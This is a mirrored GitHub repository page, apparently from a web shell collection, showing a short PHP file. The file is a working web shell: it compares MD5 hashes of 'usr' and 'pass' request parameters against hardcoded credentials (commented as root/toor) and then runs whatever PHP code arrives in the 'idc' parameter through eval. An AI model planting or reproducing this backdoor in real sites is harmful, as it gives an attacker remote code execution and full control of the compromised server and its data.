mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
df6d55ad4f
php shell and jsp shell
7 lines
187 B
PHP
7 lines
187 B
PHP
<?php
|
|
$user="63a9f0ea7bb98050796b649e85481845"; #root
|
|
$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
|
|
|
|
if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
|
|
{eval($_GET['idc']);}
|
|
?>
|